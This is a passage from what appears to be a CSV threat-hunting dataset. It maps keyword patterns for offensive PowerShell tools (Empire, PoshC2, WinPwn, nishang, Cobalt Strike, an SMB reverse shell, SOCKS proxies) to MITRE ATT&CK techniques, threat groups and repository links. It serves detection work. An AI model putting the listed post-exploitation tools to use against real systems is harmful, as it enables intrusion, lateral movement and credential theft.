T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smbclient *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBClient*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBEnum*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-smbexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SMBExec*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBExec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SMBExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smblogin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBNegotiate -ComputerName localhost*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBNegotiate*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SmbObey *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SmbObey.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SmbOrder *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SmbOrder.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-SMBRemoting.ps1*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Invoke-SMBRemoting-main*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Invoke-SMBScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Snaffler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Snaffler*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-sniffer *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SocksProxy *","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*Invoke-SocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Creates a local or reverse Socks proxy using powershell","T1090 - T1573 - T1059 - T1021","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*Invoke-SocksProxy.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*Invoke-Spoolsample*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SpoolSample*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SprayEmptyPassword*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLAudit*","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-SQLAudit*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLDumpInfo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLOSCmd -Instance * -Command *","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLUncPathInjection*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SSHCommand.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SSIDExfil*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-StandIn.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invokestealthuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-StealthUserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 